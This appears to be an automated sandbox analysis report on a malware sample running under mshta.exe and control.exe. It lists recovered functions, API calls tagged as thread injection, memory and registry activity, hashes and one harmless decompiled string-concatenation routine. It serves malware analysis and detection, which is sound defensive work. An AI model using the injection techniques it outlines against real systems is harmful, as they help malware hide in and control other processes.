Instruction Fuzzy Hash: 4D21D27A501316BFCB12EF79CC44AAABFB8AF16290B098051F905DF210DB32CE0097A0

Uniqueness

Uniqueness Score: -1.00%

Function 03C4272D, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C4272D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E03C41525(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x03c42742
0x03c42746
0x03c42750
0x03c42755
0x03c4275a
0x03c4275c
0x03c42764
0x03c42769
0x03c42777
0x03c4277c
0x03c42786

APIs

lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,048F935C,?,03C45398,004F0053,048F935C,?,?,?,?,?,?,03C47CCB), ref: 03C4273D
lstrlenW.KERNEL32(03C45398,?,03C45398,004F0053,048F935C,?,?,?,?,?,?,03C47CCB), ref: 03C42744

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,03C45398,004F0053,048F935C,?,?,?,?,?,?,03C47CCB), ref: 03C42764
memcpy.NTDLL(74E069A0,03C45398,00000002,00000000,004F0053,74E069A0,?,?,03C45398,004F0053,048F935C), ref: 03C42777

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 64cb76085a4154d52dfe11ea9b4b85aadc2c6faf4830febeae2532986b0c01d1
Instruction ID: dbceec41efa8abd7eda9f27cfca45224bb71ab45a601bc19ab2d2f3ecb521ca1
Opcode Fuzzy Hash: 64cb76085a4154d52dfe11ea9b4b85aadc2c6faf4830febeae2532986b0c01d1
Instruction Fuzzy Hash: 03F04936900118BBCF11EFA9DC84CDF7BADEF092947058062FD04DB201EB35EA109BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03C4A677, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(048F9BF8,00000000,00000000,7691C740,03C49DCB,00000000), ref: 03C4A687
lstrlen.KERNEL32(?), ref: 03C4A68F

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

lstrcpy.KERNEL32(00000000,048F9BF8), ref: 03C4A6A3
lstrcat.KERNEL32(00000000,?), ref: 03C4A6AE

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 68810e7ff3ab26df966ab5f098d8b0ada266d937c5f6ff4d97c231ec0e124426
Instruction ID: 998e18439a9d6b42575dbea7f7b668e165fd35d46c02238e6a92213598d95f21
Opcode Fuzzy Hash: 68810e7ff3ab26df966ab5f098d8b0ada266d937c5f6ff4d97c231ec0e124426
Instruction Fuzzy Hash: 7EE09237902621678711BFE4AC4CD9FBFACEF996513084416FA00D7124C724DC018BA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mshta.exe PID: 4720 Parent PID: 3352 mshta.exeCOMMON

Executed Functions

Function 000001B219740FB9, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000003.411083713.000001B219740000.00000010.00000001.sdmp, Offset: 000001B219740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 9a0c1631bcfc826306d58ebe5c3d39fc8b50cbe754f7598dbc8412847d580598
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 5A90025499540655D61511951C4539C60406B89250FD44490882791145D65D029B1162

Uniqueness

Uniqueness Score: -1.00%

Function 000001B219740FC1, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000003.411083713.000001B219740000.00000010.00000001.sdmp, Offset: 000001B219740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 9a0c1631bcfc826306d58ebe5c3d39fc8b50cbe754f7598dbc8412847d580598
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 5A90025499540655D61511951C4539C60406B89250FD44490882791145D65D029B1162

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: control.exe PID: 2904 Parent PID: 5556 control.exeCOMMON

Executed Functions

Function 00A3C3E4, Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 648COMMON

Download Yara Rule

Strings

@, xrefs: 00A3C8C3

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 95b131a181bb9719e397888e168a857e85aa1ea51ae2fc1c0b1d002b275d1072
Instruction ID: 520da13c242b7e3494dc934e2712916db240c20f78cac4be14df678320927819
Opcode Fuzzy Hash: 95b131a181bb9719e397888e168a857e85aa1ea51ae2fc1c0b1d002b275d1072
Instruction Fuzzy Hash: 4F128030618F098FDB69EF28DC85A6673E1FB98351F10462EE84AD3251EF34E945CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A54200, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationToken.NTDLL ref: 00A542B4
NtQueryInformationToken.NTDLL ref: 00A542FC
NtClose.NTDLL ref: 00A54334

Strings

0, xrefs: 00A5425F

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: InformationQueryToken$Close
String ID: 0
API String ID: 459398573-4108050209
Opcode ID: 82d3005e2ec6f9e1ba3e2abb36d5c477332dca223e8a68e3d4c881f2f4327504
Instruction ID: 03a61326058de782344a265f96c693681e6e0603846e54ee407596578f4e8c13
Opcode Fuzzy Hash: 82d3005e2ec6f9e1ba3e2abb36d5c477332dca223e8a68e3d4c881f2f4327504
Instruction Fuzzy Hash: A6311A30218B488FD764EF68D8C879AB7E2FBD9311F50492EE48EC7260DB349945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00A48078, Relevance: 6.2, APIs: 4, Instructions: 187nativethreadinjectionCOMMON

Download Yara Rule

APIs

NtSetInformationProcess.NTDLL ref: 00A48120
CreateRemoteThread.KERNELBASE ref: 00A481C6
FindCloseChangeNotification.KERNELBASE ref: 00A48218

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: ChangeCloseCreateFindInformationNotificationProcessRemoteThread
String ID:
API String ID: 1964589409-0
Opcode ID: 77836309125ecb390f7ffe782e7c34ba8159935c24fcd30029f2887e37914124
Instruction ID: 3c6bdf44b6f0ff8c3391c24ea9552867ee57940f86956da72ddab538664d00ca
Opcode Fuzzy Hash: 77836309125ecb390f7ffe782e7c34ba8159935c24fcd30029f2887e37914124
Instruction Fuzzy Hash: AB51C535618F058FE758EF68E8996AA77E1FBD8301F00452DE94AC3251EF74DD058B81

Uniqueness

Uniqueness Score: -1.00%

Function 00A57548, Relevance: 4.1, APIs: 2, Instructions: 1069synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexExA.KERNEL32 ref: 00A57615
GetUserNameA.ADVAPI32 ref: 00A5784E

Part of subcall function 00A4D7C0: CreateThread.KERNELBASE ref: 00A4D7F0
Part of subcall function 00A4D7C0: QueueUserAPC.KERNELBASE ref: 00A4D807

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: CreateUser$MutexNameQueueThread
String ID:
API String ID: 2503873790-0
Opcode ID: eab1205d177f2554c9cad4958cdfb841b1a8b714eb958c65cdb1b37a11e61533
Instruction ID: fc1da4718cf4bc2f56d62941895cbd0a504596f1d018d9fd36fd539b888f1641
Opcode Fuzzy Hash: eab1205d177f2554c9cad4958cdfb841b1a8b714eb958c65cdb1b37a11e61533
Instruction Fuzzy Hash: 3972BA7161CA088FE758EF68EC85A6977E2F798701F10452ED84BC3161DF38E946CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A570F8, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214nativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL ref: 00A5729A

Part of subcall function 00A4B080: NtMapViewOfSection.NTDLL ref: 00A4B0CC

Strings

0, xrefs: 00A5728E

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: Section$CreateView
String ID: 0
API String ID: 1585966358-4108050209
Opcode ID: 6e89f8329592c92116b83fcab91bf035811fe26fbf2ec00b7ddc5277dc290f1f
Instruction ID: 8548ef3f37b23f3cf33fc0b4adf56ee44e1442aa396bd91907378afb95d84bab
Opcode Fuzzy Hash: 6e89f8329592c92116b83fcab91bf035811fe26fbf2ec00b7ddc5277dc290f1f
Instruction Fuzzy Hash: 2861D57061CF098FDB54EF28D8896A977E1FB98312F10456EE84EC7261DB34E845CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00A43104, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 00A43141

Strings

@, xrefs: 00A43125

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: AllocateMemoryVirtual
String ID: @
API String ID: 2167126740-2766056989
Opcode ID: 8d4732d9c3ff9b6230e989f0a9f519aae7c9f752d3bb2c0929438e494037e1d7
Instruction ID: 2ef45abdff870f9d43702bf82dd7f2b8e89de48d62153e0574475696e66fd629
Opcode Fuzzy Hash: 8d4732d9c3ff9b6230e989f0a9f519aae7c9f752d3bb2c0929438e494037e1d7
Instruction Fuzzy Hash: 6CF090B1A15B088BDF449FA9D8CC66A76E0F75C305F500A6DE11AC7254DB788A048791

Uniqueness

Uniqueness Score: -1.00%

Function 00A6B00B, Relevance: 3.3, APIs: 2, Instructions: 334nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 00A6B27A
NtProtectVirtualMemory.NTDLL ref: 00A6B309

Memory Dump Source

Source File: 00000015.00000002.539999353.0000000000A6B000.00000040.00020000.sdmp, Offset: 00A6B000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 93545c074f849a76240f8e8faaf6773f543a626d666d23b5e59c10b821f1a2ac
Instruction ID: bc7360208be7aa4c5517da354726b6e0f4b4d1cb7603bcff7af1f318f3ceefcd
Opcode Fuzzy Hash: 93545c074f849a76240f8e8faaf6773f543a626d666d23b5e59c10b821f1a2ac
Instruction Fuzzy Hash: 25A1F83222CB884FC725DF28DC916AAB7F1FB96310F58456ED0CBC7252D734A5868752

Uniqueness

Uniqueness Score: -1.00%

Function 00A474E0, Relevance: 3.2, APIs: 2, Instructions: 183memorynativeCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00A4750B
NtQueryInformationProcess.NTDLL ref: 00A47555

Part of subcall function 00A3B964: NtReadVirtualMemory.NTDLL ref: 00A3B983

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: AllocateHeapInformationMemoryProcessQueryReadVirtual
String ID:
API String ID: 886377554-0
Opcode ID: 18ae1c05c515bf36e5b9d74936394f93599d8949271db009cc8aaf041d4d03b7
Instruction ID: 73716a34235378949edf544d9a5ef537477c89e00a48a77e4a69bf93677d3b28
Opcode Fuzzy Hash: 18ae1c05c515bf36e5b9d74936394f93599d8949271db009cc8aaf041d4d03b7
Instruction Fuzzy Hash: 3D51843021DB498BDB59EB2CD8857AAB3E6FBD8300F00452EA44DC3255DF38D941CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00A559E4, Relevance: 1.8, APIs: 1, Instructions: 292memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE ref: 00A55A3E

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 24762473a32ee086b9eb70598c7ad1b661e883cceb95d3e836c27c253e15357a
Instruction ID: 3b6ed3baf275d30ec6ade91820ed20e35173fff85b97b617de1cbf1f85c94598
Opcode Fuzzy Hash: 24762473a32ee086b9eb70598c7ad1b661e883cceb95d3e836c27c253e15357a
Instruction Fuzzy Hash: 2481B230618F098FEB18EF78E89966633E5FB94352F00453EE98AC3261EE74D8468741

Uniqueness

Uniqueness Score: -1.00%

Function 00A4B164, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 00A4B18A

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: e37b66c4b92a1b40773e5e2e35638161dbf108b70afce818149c44752229e966
Instruction ID: ecf5b7421f1d102057230b99179dbd44969a87853320b14a32b32eb203b20687
Opcode Fuzzy Hash: e37b66c4b92a1b40773e5e2e35638161dbf108b70afce818149c44752229e966
Instruction Fuzzy Hash: 46018134328E0D8F9B84EF6CD5D4A6573E1FBE8346B50466EA40AC3124D738D985CB12

Uniqueness

Uniqueness Score: -1.00%

Function 00A4B080, Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 00A4B0CC

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction ID: 5a2f5cfcc8340fa623b14e54ed97255b435394717cd9c544fffb50178993c226
Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction Fuzzy Hash: 9D01D2B0A08B048FCB48EF69D0C8569BBE1FB98311B10066FE949CB796DB71D885CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00A48844, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL ref: 00A48863

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: d9439c28699aa8b651feb355c1f3ed1f6230fccf199fd5306b9ed0f6f9cbf5e2
Instruction ID: 14027c6e64691c5139eaebf45367a2d25ed999578712363500bf8fc5bc5fff60
Opcode Fuzzy Hash: d9439c28699aa8b651feb355c1f3ed1f6230fccf199fd5306b9ed0f6f9cbf5e2
Instruction Fuzzy Hash: B5E01A38B16A448BEB046BB5ACC92BD72E1F7D8306F544879E945C7260DA6DC8448782

Uniqueness

Uniqueness Score: -1.00%

Function 00A3B964, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL ref: 00A3B983

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: c930efd44b2eda8dee3e45ad2ffdbecced8a0f4a21a45ee75eca18a7f9d03485
Instruction ID: b014aaf675034548ea6722babc23241ffb03b937162c294f63bac269af85b9e2
Opcode Fuzzy Hash: c930efd44b2eda8dee3e45ad2ffdbecced8a0f4a21a45ee75eca18a7f9d03485
Instruction Fuzzy Hash: 13E04F74B25A444FEB54AFF588C933977E2F789305F200839FA85C7360DB29C8858752

Uniqueness

Uniqueness Score: -1.00%

Function 00A532BC, Relevance: 6.2, APIs: 4, Instructions: 234threadinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 00A39C5C: FindCloseChangeNotification.KERNELBASE ref: 00A39D08

VirtualProtectEx.KERNELBASE ref: 00A533C3
ResumeThread.KERNELBASE ref: 00A53400
SuspendThread.KERNELBASE ref: 00A53423
VirtualProtectEx.KERNELBASE ref: 00A534A0

Part of subcall function 00A4607C: VirtualProtectEx.KERNELBASE ref: 00A460D0

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: ProtectVirtual$Thread$ChangeCloseFindNotificationResumeSuspend
String ID:
API String ID: 4107391026-0
Opcode ID: f954eb41b0b9f5b85e9f87f73cb73a1f2f1ca2d0821617ebfca6a355b52add5c
Instruction ID: 16fb2aebf8f181023583ad39d72848cce90947fd4dc9fee087d1749c48db11e0
Opcode Fuzzy Hash: f954eb41b0b9f5b85e9f87f73cb73a1f2f1ca2d0821617ebfca6a355b52add5c
Instruction Fuzzy Hash: 3961813171CB084BDB59EB28D8857AA73E1FBC9352F10492DE98BC3151DF38D9468B46

Uniqueness

Uniqueness Score: -1.00%

Function 00A58D58, Relevance: 6.1, APIs: 4, Instructions: 145fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE ref: 00A58E2C
SetFilePointer.KERNELBASE ref: 00A58E46
ReadFile.KERNELBASE ref: 00A58E68
FindCloseChangeNotification.KERNELBASE ref: 00A58E83

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: File$ChangeCloseCreateFindNotificationPointerRead
String ID:
API String ID: 2405668454-0
Opcode ID: fdd9c8ee6756b0408da222e8828b4a6a7cd32857edfab776e54c02e258de523f
Instruction ID: 922bb1c63989518f55cff76f96e54ec23ed834ac924daf197961a380166d9d34
Opcode Fuzzy Hash: fdd9c8ee6756b0408da222e8828b4a6a7cd32857edfab776e54c02e258de523f
Instruction Fuzzy Hash: 3341A730218A084FDB58EF28D8C562A77F1FB98316F24466DD84BD7265DF39D8468F81

Uniqueness

Uniqueness Score: -1.00%

Function 00A3CB68, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 222stringCOMMON

Download Yara Rule

APIs

lstrcmp.KERNEL32 ref: 00A3CCCF
RtlDeleteBoundaryDescriptor.NTDLL ref: 00A3CD49

Strings

, xrefs: 00A3CC23

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: BoundaryDeleteDescriptorlstrcmp
String ID:
API String ID: 735288309-3916222277
Opcode ID: f3edc52901811f7506c16f10e0dfd0b973d878cf9c272a53901dbaf2a4f13129
Instruction ID: 1d791529f36e3fd5a2d5f95fef55b30f7e276eda835f9dc565b0e57ddc012f00
Opcode Fuzzy Hash: f3edc52901811f7506c16f10e0dfd0b973d878cf9c272a53901dbaf2a4f13129
Instruction Fuzzy Hash: AD51153161CA484BD72CAF1C9C86179B7D5E799321F64023EF9DEE3261DA249C538BC2

Uniqueness

Uniqueness Score: -1.00%

Function 00A4466C, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 145registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A31EEC: RegCreateKeyA.ADVAPI32 ref: 00A31F0F

RegQueryValueExA.KERNELBASE ref: 00A446E0

Strings

(, xrefs: 00A4472B
(, xrefs: 00A446EC

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: CreateQueryValue
String ID: ($(
API String ID: 2711935003-222463766
Opcode ID: 79b8343bb0af69eddd8a37dabf74b61d41a1f37887125f18d628855fe0bafd98
Instruction ID: 08a209f88f9779f195239845eedfcb28dac0ea86fbfca356e756145cb5556ed2
Opcode Fuzzy Hash: 79b8343bb0af69eddd8a37dabf74b61d41a1f37887125f18d628855fe0bafd98
Instruction Fuzzy Hash: 6841B5346187488FE758EF18E8987AA77E5FBDC305F10852DD88AC3261DB78D946CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00A52AE0, Relevance: 4.6, APIs: 3, Instructions: 101registrymemoryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-0000001F), ref: 00A52B23
RtlAllocateHeap.NTDLL ref: 00A52B45
RegQueryValueExA.KERNELBASE ref: 00A52BA7

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: QueryValue$AllocateHeap
String ID:
API String ID: 2311914766-0
Opcode ID: e9794a981b4d061b7d94558a4ec75b83a24dfc832a2dda5f79d3e21396e447dd
Instruction ID: 7ef0b984762398acc8a2bb9772c1126789b31a3be71d009d2c7a8ff6dfc626da
Opcode Fuzzy Hash: e9794a981b4d061b7d94558a4ec75b83a24dfc832a2dda5f79d3e21396e447dd
Instruction Fuzzy Hash: 7E31813161CB088FDB48EF18E8C9666B7E1FBA8311F11456EE849C3251DF74E845CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00A5C5C4, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 00A5C701

Strings

H, xrefs: 00A5C5E8

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: H
API String ID: 1029625771-2852464175
Opcode ID: c238962a3fa07e4d1838bce89e85050b2149dfe2f58e80bb112a2cbeb364851f
Instruction ID: 313f673c30b532cd9e3b1d20d44e93698e328b9073ec2867a46dc1f9f46c1154
Opcode Fuzzy Hash: c238962a3fa07e4d1838bce89e85050b2149dfe2f58e80bb112a2cbeb364851f
Instruction Fuzzy Hash: 69A1A230508F0A8FE755DF58D8886B6B7E1FBA8316F04462ED88AC7265EF34D945CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A56B40, Relevance: 3.2, APIs: 2, Instructions: 203memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A59F70: VirtualProtect.KERNELBASE ref: 00A59FA3

VirtualProtect.KERNELBASE ref: 00A56C61
VirtualProtect.KERNELBASE ref: 00A56C84

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e847b7687cf1ef722bfd3925424ae8f99a4fae4f6502d916fc932d490f6fd38a
Instruction ID: 92032c536ab520a209c97ca4f067ec555a44cbe73cd6ea3ac231535bde38b745
Opcode Fuzzy Hash: e847b7687cf1ef722bfd3925424ae8f99a4fae4f6502d916fc932d490f6fd38a
Instruction Fuzzy Hash: 30516E70618F098FDB44EF29D889625B7E0FB9C306F54066EE84EC7261DB34E945CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00A564D8, Relevance: 3.2, APIs: 2, Instructions: 152COMMON

Download Yara Rule

APIs

StrRChrA.KERNELBASE ref: 00A5654B
RtlAddVectoredContinueHandler.NTDLL ref: 00A5663F

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: ContinueHandlerVectored
String ID:
API String ID: 3758255415-0
Opcode ID: aac374c7db173740de99583ebd5bce70f914f0f43564cf06a8166c59b6a93847
Instruction ID: 02401ef8f9a36f463796115988d23fb32641a90df94fdc0ba0bf5c4612f53c0b
Opcode Fuzzy Hash: aac374c7db173740de99583ebd5bce70f914f0f43564cf06a8166c59b6a93847
Instruction Fuzzy Hash: 6D41FA3160CA494FE754EF34E85866A77D2FBA8306F45092EE84AD3261EF38C549CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00A40BCC, Relevance: 3.1, APIs: 2, Instructions: 114registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(?,?,?,?,?,?,0000F3A4,00A58422,?,?,?,?,?,?,0000007E,00A57B98), ref: 00A40C30
RegCloseKey.KERNELBASE ref: 00A40CB3

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: CloseOpen
String ID:
API String ID: 47109696-0
Opcode ID: 39ab0952b06d311fde61117c0b70ba7d7a8437f4eadbd7785cf578915d85803b
Instruction ID: 44069f0dfa6f5a8f50c4382f3802fb6288f9321f2d9667ffd636dea3b2419d12
Opcode Fuzzy Hash: 39ab0952b06d311fde61117c0b70ba7d7a8437f4eadbd7785cf578915d85803b
Instruction Fuzzy Hash: 67316434618B0C8FDB94EF68E884A26B3E1F798301B504A7EE54EC3215DB38D945C781

Uniqueness

Uniqueness Score: -1.00%

Function 00A540A8, Relevance: 3.1, APIs: 2, Instructions: 96registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE ref: 00A540E6
RegCloseKey.KERNELBASE ref: 00A54153

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 068b066487bd6c1021a25dd1c927a041a76502c0f8dfc02713d2790afb282f83
Instruction ID: 0ebbec23b52c1084c05f12af8ab2bd114bdd17de6af6b3a912752fc3acee1dc2
Opcode Fuzzy Hash: 068b066487bd6c1021a25dd1c927a041a76502c0f8dfc02713d2790afb282f83
Instruction Fuzzy Hash: DE215130618E088FD758EF68E84966577E1FBAC315F10456EE889C3261DF74D881CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00A31EEC, Relevance: 3.1, APIs: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32 ref: 00A31F0F
RegOpenKeyA.ADVAPI32 ref: 00A31F1C

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: CreateOpen
String ID:
API String ID: 436179556-0
Opcode ID: 1a11e0354ff453eb4079644fbf2a1b7d20cfffb3db12b2390f2ac9c967f3a1db
Instruction ID: 2347e8d2f5c0f210bac07888ac676707c7b32086d39c2e890a1caf8f49c99333
Opcode Fuzzy Hash: 1a11e0354ff453eb4079644fbf2a1b7d20cfffb3db12b2390f2ac9c967f3a1db
Instruction Fuzzy Hash: D5018030618A088FDB55EB5C9488B2ABBE5FBA9341F14052EF88EC3361DB74C9458782

Uniqueness

Uniqueness Score: -1.00%

Function 00A4D7C0, Relevance: 3.1, APIs: 2, Instructions: 59threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00A4D7F0
QueueUserAPC.KERNELBASE ref: 00A4D807

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: CreateQueueThreadUser
String ID:
API String ID: 3600083758-0
Opcode ID: 74ad3154cc97680a0f5f16fb0e28fb4fa3bdb5284cf7d3b8316e52726ceedce4
Instruction ID: c4c50eea72e896287c16462b1e35b51409f37ff938495e54c8369ea8d083635b
Opcode Fuzzy Hash: 74ad3154cc97680a0f5f16fb0e28fb4fa3bdb5284cf7d3b8316e52726ceedce4
Instruction Fuzzy Hash: A6015231718A084FEB44EF6D985D77977E2E7D8315714816AA44DC3264DF74DC818781

Uniqueness

Uniqueness Score: -1.00%

Function 00A36E98, Relevance: 1.7, APIs: 1, Instructions: 216memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00A36FE3

Memory Dump Source

Source File: 00000015.00000002.539747684.0000000000A31000.00000020.00020000.sdmp, Offset: 00A31000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
